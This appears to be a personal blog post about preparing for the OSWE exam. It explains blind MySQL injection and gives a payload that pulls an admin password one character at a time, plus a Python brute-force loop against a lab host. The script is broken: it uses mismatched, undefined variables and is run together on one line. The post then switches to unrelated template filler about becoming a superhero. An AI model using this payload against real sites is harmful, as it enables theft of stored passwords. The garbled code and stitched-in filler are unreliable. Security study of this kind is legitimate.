My AWAE lab just ended today, while I'm having 3 days left to go for the OSWE exam. I've been living under stressful for almost 8 months before the course and during the course as well.
Just a word for OSWE is "amazing", I'd not say much about the course because many ppl out there already sharing about their thoughts in details. The thing I've learnt from AWAE course is MySQL, especially the blind one coz it's more advanced and much harder to extract the data compared to the classic SQLi.
I've been trying to find the fastest way to extract the data from the database in blind SQLi cases. I was wandering around exploit-db paper and finding out an interesting topic that I have not learned yet "Faster Blind MySQL Injection Using Bit Shifting". Read through the paper and I wanted to make a script for this to improve my brute-force mechanism.
The trivial way to get extract the data is using substring
or substr
function. For example, we have a simple payload
test' or (ascii(substring((select password from admin),%d,1)))=[CHAR] or 1='
If it's true, the headers['Content-Length']
will be greater than 20 and otherwise.
Usually, what we do is to brute force every each character of the password in this case, and compare the value of ascii(password) to the ASCII decimal.
Type: man ascii
So the python code should be
for i in range(1, 8):injection_string = "test' or (ascii(substring((select password from admin),%d,1)))=[CHAR] or 1='" % (inj,i)for j in range(32, 126): #every possible character in the ASCII printable settarget = "http://kubertu/index_public.php?q=%s" % (ip, inj_str.replace("[CHAR]", str(j)))r = requests.get(target)content_length = int(r.headers['Content-Length'])if (content_length > 20):return j
Becoming a super hero is a fairly straight forward process:
$ give me super-powers
Super-powers are granted randomly so please submit an issue if you're not happy with yours.
Once you're strong enough, save the world:
hello.sh# Ain't no code for that yet, sorryecho 'You got to trust me on this, I saved the world'